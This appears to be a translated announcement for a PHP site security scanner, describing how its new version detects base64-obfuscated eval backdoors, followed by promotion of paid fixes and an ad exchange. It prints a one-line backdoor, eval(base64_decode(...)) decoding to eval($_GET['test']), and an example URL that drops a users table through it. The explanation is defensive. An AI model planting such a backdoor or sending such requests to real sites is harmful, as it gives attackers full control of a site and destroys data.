The scanner checks the input data received from the user and analyzes their behavior in the code. The analysis of all functions to determine degree of danger or safety which is used in further analysis of the code is produced. Therefore it is very important not to download separate modules (since they use the functions that are described elsewhere), but the entire site (project) as a whole. Otherwise, scan report may be erroneous. In version 0.6.0 the hidden code generated by the function base64_encode and used in conjunction eval (base64_decode ()); is analyzed. This is an example below:
The simplest code that an attacker can keep in a template or in some module is as follows:
eval (base64_decode ("JF9HRVRbJ3Rlc3QnXQ =="));
And it is quite enough to get full access to the site and the database. Why is it so? Everything is simple though is not noticeable thanks to base64_decode. Base64_decode function decodes that base64_encode function encodes. Therefore, seemed to be harmless code: eval (base64_decode ("JF9HRVRbJ3Rlc3QnXQ =="));
turns into this:
eval ($ _GET ['test']);
That is to say everything that is transferred by GET to a test parameter, for example:
http://site.ru/?test=mysql_query ('DROP TABLE users');
will be done.
In this case, the table of users will be deleted. It is difficult to imagine more terrible security hole. But starting with a version 0.6.0 the scanner catches a similar code. Therefore we recommend checking your site again, if you already did it. If this line or a similar one is found on your site, simply remove it. If you are unsure, please contact on the site, and we will help you to correct the error.
Besides this gaps at the tips are fixed in the version 0.6.0. By clicking the button “Help” after scanning you will get tips on how to fix this or that error in the code. If you are not sure in your own abilities to remove vulnerabilities, please contact us. And we will correct everything for a low fee.
We provide webmasters the opportunity to advertise their projects, by using our designed system of advertising exchange. In our system for every ad unit you have shown which is as follows:
Your ad will be shown up to 5 times in the same ad unit! Why is up to? It is a temporary inconvenience, until there is a dozen sites connected to our system. After you register and login to this page, you will be available to our system interface. It allows you to create ad units, see the list of sites connected to the system and also view detailed statistics of the current state of impressions and clicks on your advertisement as a unit, as well as by visitors of your ads. There is also the possibility of transferring the balance of the current hits, with one ad unit to another which makes it possible to promote the young projects, due to already advanced. If you have any offers or suggestions for the development of a system, you can leave them in our forum.
I wish you less problems with your project security!